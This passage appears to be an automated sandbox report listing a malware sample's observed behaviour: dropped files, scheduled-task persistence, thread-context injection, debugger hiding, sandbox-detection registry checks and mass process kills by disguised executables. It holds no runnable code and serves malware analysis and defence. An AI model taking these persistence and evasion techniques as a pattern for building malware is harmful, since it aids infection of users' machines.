C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 ncZxzUl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_20042448ADAF8552A0F71F2212C13E64 ncZxzUl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive schtasks.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\sqtvvs.exe svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ncZxzUl.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\Tasks\bvmcjEjDUxHOOxIZsK svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive WMIC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ncZxzUl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 ncZxzUl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 ncZxzUl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_8A6A7E24EA4C3355B6BE43AA2093BF34 ncZxzUl.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat ncZxzUl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ncZxzUl.exe File opened for modification C:\Windows\System32\Tasks\spuzKSvQhhvm svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent C84C4D9710B3A8EA svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ncZxzUl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive backgroundTaskHost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ncZxzUl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ncZxzUl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_8A6A7E24EA4C3355B6BE43AA2093BF34 ncZxzUl.exe File opened for modification C:\Windows\System32\Tasks\eoTgVxzVyVjpEcHcuxi2 svchost.exe File opened for modification C:\Windows\System32\Tasks\LUNOxqyZdvVpf2 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 27 IoCs
Processes:
Fri142dfd92e4.exe6673940.scr6761514.scr2435700.scr3666041.scr48iBOGFfZcAHwHGUy8oYSX3n.exerxJyBKt0ExZbSiqrhVOMbS9A.exeBiO3wpp_CDFNfV88Yvz50Dwt.exeHu6UM846W1snw3koNJbBUJoj.exe4808953.scr7435204.scr1C6D.exeBB3.exe56BA.exepid process 4468 Fri142dfd92e4.exe 6152 6673940.scr 6532 6761514.scr 2260 2435700.scr 6856 3666041.scr 5608 48iBOGFfZcAHwHGUy8oYSX3n.exe 2804 rxJyBKt0ExZbSiqrhVOMbS9A.exe 5944 BiO3wpp_CDFNfV88Yvz50Dwt.exe 3512 Hu6UM846W1snw3koNJbBUJoj.exe 4392 4808953.scr 2364 7435204.scr 4112 1C6D.exe 5084 BB3.exe 5084 BB3.exe 5084 BB3.exe 5084 BB3.exe 5084 BB3.exe 5084 BB3.exe 5084 BB3.exe 5084 BB3.exe 5084 BB3.exe 5084 BB3.exe 5084 BB3.exe 5084 BB3.exe 5084 BB3.exe 5084 BB3.exe 6860 56BA.exe -
Suspicious use of SetThreadContext 13 IoCs
Processes:
Fri146662f370123e.exesvchost.exenW_gvItndwH96Ia7u6hAStyP.exeXMxcZciAXUPN2RfsBdZpysSq.exek7pzcJTPzykV4PrUTt_7f0NP.exe5QdXYw7rNlVD7vtMvDqPvns3.exePlsWnEU2.exeservices64.execmd.exetmpE195_tmp.exeBB3.exe2EED.exebdbwwjcdescription pid process target process PID 2036 set thread context of 5172 2036 Fri146662f370123e.exe Fri146662f370123e.exe PID 3156 set thread context of 2712 3156 svchost.exe svchost.exe PID 4720 set thread context of 4848 4720 nW_gvItndwH96Ia7u6hAStyP.exe nW_gvItndwH96Ia7u6hAStyP.exe PID 4536 set thread context of 4636 4536 XMxcZciAXUPN2RfsBdZpysSq.exe XMxcZciAXUPN2RfsBdZpysSq.exe PID 7432 set thread context of 5268 7432 k7pzcJTPzykV4PrUTt_7f0NP.exe RegSvcs.exe PID 2824 set thread context of 8304 2824 5QdXYw7rNlVD7vtMvDqPvns3.exe 5QdXYw7rNlVD7vtMvDqPvns3.exe PID 2380 set thread context of 3260 2380 PlsWnEU2.exe PlsWnEU2.exe PID 8464 set thread context of 3936 8464 services64.exe explorer.exe PID 9092 set thread context of 6324 9092 cmd.exe 7y3NdIrVK2i3FDWE71OLqeGI.exe PID 10044 set thread context of 7680 10044 tmpE195_tmp.exe tmpE195_tmp.exe PID 5084 set thread context of 6048 5084 BB3.exe BB3.exe PID 9992 set thread context of 6400 9992 2EED.exe RegSvcs.exe PID 9284 set thread context of 516 9284 bdbwwjc bdbwwjc -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeautosubplayer.exeGoogleUpdateSetup.exeGoogleUpdateSetup.exepowershell.exeultramediaburner.tmpConhost.exeelevation_service.exeGoogleUpdate.exedata_load.exencZxzUl.exeGoogleUpdate.exedescription ioc process File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\dailymotion.luac autosubplayer.exe File opened for modification C:\Program Files\temp_files\ autosubplayer.exe File created C:\Program Files (x86)\Google\Temp\GUMC729.tmp\goopdateres_vi.dll GoogleUpdateSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM86EF.tmp\goopdateres_ar.dll GoogleUpdateSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM86EF.tmp\goopdateres_fil.dll GoogleUpdateSetup.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\simplexml.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\Google\Temp\GUM86EF.tmp\goopdateres_no.dll GoogleUpdateSetup.exe File created C:\Program Files (x86)\lighteningplayer\regstr autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\misc\libvod_rtsp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\Google\Temp\GUMC729.tmp\goopdateres_gu.dll GoogleUpdateSetup.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\error_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\EhdpuqeT\EhdpuqeT.dll powershell.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\create_stream.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libattachment_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\Google\Temp\GUMC729.tmp\goopdateres_es.dll GoogleUpdateSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM86EF.tmp\psmachine.dll GoogleUpdateSetup.exe File created C:\Program Files (x86)\Google\Temp\GUM86EF.tmp\goopdateres_kn.dll GoogleUpdateSetup.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Conhost.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png autosubplayer.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir644_276973879\manifest.json elevation_service.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\create_stream.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\offset_window.html autosubplayer.exe File opened for modification C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir644_276973879\GoogleUpdateSetup.exe elevation_service.exe File created C:\Program Files (x86)\Google\Temp\GUMC729.tmp\GoogleUpdateBroker.exe GoogleUpdateSetup.exe File opened for modification C:\Program Files (x86)\Google\Update\Install\{67291D7E-0687-4F58-A8D6-C6868C2FA1DC}\GoogleUpdateSetup.exe GoogleUpdate.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\index.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll autosubplayer.exe File opened for modification C:\Program Files\temp_files\bckf.fon data_load.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css autosubplayer.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ncZxzUl.exe File created C:\Program Files (x86)\Google\Temp\GUM86EF.tmp\goopdateres_nl.dll GoogleUpdateSetup.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac autosubplayer.exe File created C:\Program Files (x86)\Google\Temp\GUMC729.tmp\goopdateres_fa.dll GoogleUpdateSetup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.111\goopdateres_fr.dll GoogleUpdate.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Back-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\youtube.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\Google\Temp\GUMC729.tmp\GoogleUpdateOnDemand.exe GoogleUpdateSetup.exe File created C:\Program Files (x86)\Google\Temp\GUMC729.tmp\goopdateres_ur.dll GoogleUpdateSetup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.111\goopdateres_fi.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.111\goopdateres_ta.dll GoogleUpdate.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac autosubplayer.exe -
Drops file in Windows directory 64 IoCs
Processes:
msiexec.exeschtasks.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeschtasks.exeMicrosoftEdge.exechrome.exeforfiles.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdge.exeschtasks.exeMicrosoftEdgeCP.exeschtasks.exeMicrosoftEdgeCP.exeschtasks.exedescription ioc process File opened for modification C:\Windows\Installer\MSI8D6A.tmp msiexec.exe File created C:\Windows\Tasks\TzpzstmaipgnuWYOU.job schtasks.exe File opened for modification C:\Windows\Installer\MSI1C02.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI8AB0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8BBA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1864.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI8C0A.tmp msiexec.exe File created C:\Windows\Tasks\bvmcjEjDUxHOOxIZsK.job schtasks.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI88C.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\1847152663\4112857022.pri chrome.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp forfiles.exe File opened for modification C:\Windows\Installer\MSI8BCB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI676B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI13EC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8C5C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI87DB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8F40.tmp msiexec.exe File opened for modification C:\Windows\Tasks\RulYNORIEfYpYdh.job svchost.exe File opened for modification C:\Windows\Installer\MSI1759.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI905A.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\Installer\986ea.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI17C7.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Tasks\bvmcjEjDUxHOOxIZsK.job schtasks.exe File opened for modification C:\Windows\Installer\MSI8A1E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8E77.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9A6.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI169C.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI75C8.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI97E0.tmp msiexec.exe File created C:\Windows\Tasks\YqJChhYnTMHzkMjCc.job schtasks.exe File opened for modification C:\Windows\Tasks\YqJChhYnTMHzkMjCc.job svchost.exe File opened for modification C:\Windows\Installer\MSI1A3B.tmp msiexec.exe File created C:\Windows\Installer\986e7.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI8BE3.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSID42.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI81FE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8C72.tmp msiexec.exe File opened for modification C:\Windows\Installer\986e7.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI73E2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8F62.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI68E3.tmp msiexec.exe File opened for modification C:\Windows\Tasks\bvmcjEjDUxHOOxIZsK.job svchost.exe File created C:\Windows\Tasks\RulYNORIEfYpYdh.job schtasks.exe File opened for modification C:\Windows\Installer\MSI8B0A.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 25 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6272 6108 WerFault.exe ShadowVPNInstaller_t3.exe 6920 6108 WerFault.exe ShadowVPNInstaller_t3.exe 6488 6108 WerFault.exe ShadowVPNInstaller_t3.exe 4788 6108 WerFault.exe ShadowVPNInstaller_t3.exe 4740 6108 WerFault.exe ShadowVPNInstaller_t3.exe 7236 6108 WerFault.exe ShadowVPNInstaller_t3.exe 7008 6108 WerFault.exe ShadowVPNInstaller_t3.exe 8412 6108 WerFault.exe ShadowVPNInstaller_t3.exe 8852 6108 WerFault.exe ShadowVPNInstaller_t3.exe 9032 6108 WerFault.exe ShadowVPNInstaller_t3.exe 5936 6108 WerFault.exe ShadowVPNInstaller_t3.exe 1008 6108 WerFault.exe ShadowVPNInstaller_t3.exe 8680 6108 WerFault.exe ShadowVPNInstaller_t3.exe 6848 6108 WerFault.exe ShadowVPNInstaller_t3.exe 4544 6108 WerFault.exe ShadowVPNInstaller_t3.exe 4688 6108 WerFault.exe ShadowVPNInstaller_t3.exe 4984 6108 WerFault.exe ShadowVPNInstaller_t3.exe 9064 7100 WerFault.exe rundll32.exe 3764 4720 WerFault.exe nW_gvItndwH96Ia7u6hAStyP.exe 4768 7416 WerFault.exe asRd1Lh9BjOa6OqwKJDOQ6Xi.exe 2280 7416 WerFault.exe asRd1Lh9BjOa6OqwKJDOQ6Xi.exe 6900 7416 WerFault.exe asRd1Lh9BjOa6OqwKJDOQ6Xi.exe 5036 7416 WerFault.exe asRd1Lh9BjOa6OqwKJDOQ6Xi.exe 3756 7416 WerFault.exe asRd1Lh9BjOa6OqwKJDOQ6Xi.exe 8440 4540 WerFault.exe sdkuibuilder.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
bdbwwjcFri140d16d9a199.exe5QdXYw7rNlVD7vtMvDqPvns3.exeTqhsT9nmJmEeKVXH993sOyjd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bdbwwjc Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Fri140d16d9a199.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5QdXYw7rNlVD7vtMvDqPvns3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TqhsT9nmJmEeKVXH993sOyjd.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TqhsT9nmJmEeKVXH993sOyjd.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TqhsT9nmJmEeKVXH993sOyjd.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bdbwwjc Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bdbwwjc Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Fri140d16d9a199.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Fri140d16d9a199.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5QdXYw7rNlVD7vtMvDqPvns3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5QdXYw7rNlVD7vtMvDqPvns3.exe -
Checks processor information in registry 2 TTPs 11 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exeschtasks.exefirefox.execJsH7uQzEOp3fRa5EUpxJxRm.exekeygen-step-1.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 schtasks.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString schtasks.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cJsH7uQzEOp3fRa5EUpxJxRm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 keygen-step-1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString keygen-step-1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 cJsH7uQzEOp3fRa5EUpxJxRm.exe -
Creates scheduled task(s) 1 TTPs 19 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5144 schtasks.exe 9856 schtasks.exe 4984 schtasks.exe 1356 schtasks.exe 8044 schtasks.exe 8072 schtasks.exe 7472 schtasks.exe 7592 schtasks.exe 4808 schtasks.exe 9724 schtasks.exe 8660 schtasks.exe 11048 schtasks.exe 7748 schtasks.exe 7608 schtasks.exe 7708 schtasks.exe 10076 schtasks.exe 2492 schtasks.exe 2488 schtasks.exe 9144 schtasks.exe -
Delays execution with timeout.exe 4 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exepid process 6856 timeout.exe 6576 timeout.exe 4108 timeout.exe 2348 timeout.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 15 IoCs
Processes:
Install.exechrome.exerundll32.exechrome.exechrome.exeInstall.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 20 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 792 taskkill.exe 6868 taskkill.exe 8216 taskkill.exe 7340 taskkill.exe 5796 taskkill.exe 2196 taskkill.exe 10036 taskkill.exe 9920 taskkill.exe 11000 taskkill.exe 7376 taskkill.exe 8732 taskkill.exe 5616 taskkill.exe 6684 taskkill.exe 8312 taskkill.exe 3740 taskkill.exe 8884 taskkill.exe 8068 taskkill.exe 7732 taskkill.exe 10652 taskkill.exe 10536 taskkill.exe -
Processes:
MicrosoftEdge.exetaskkill.exeMicrosoftEdgeCP.exebrowser_broker.exeYuDaebe.exebrowser_broker.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main taskkill.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch YuDaebe.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Toolbar Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet 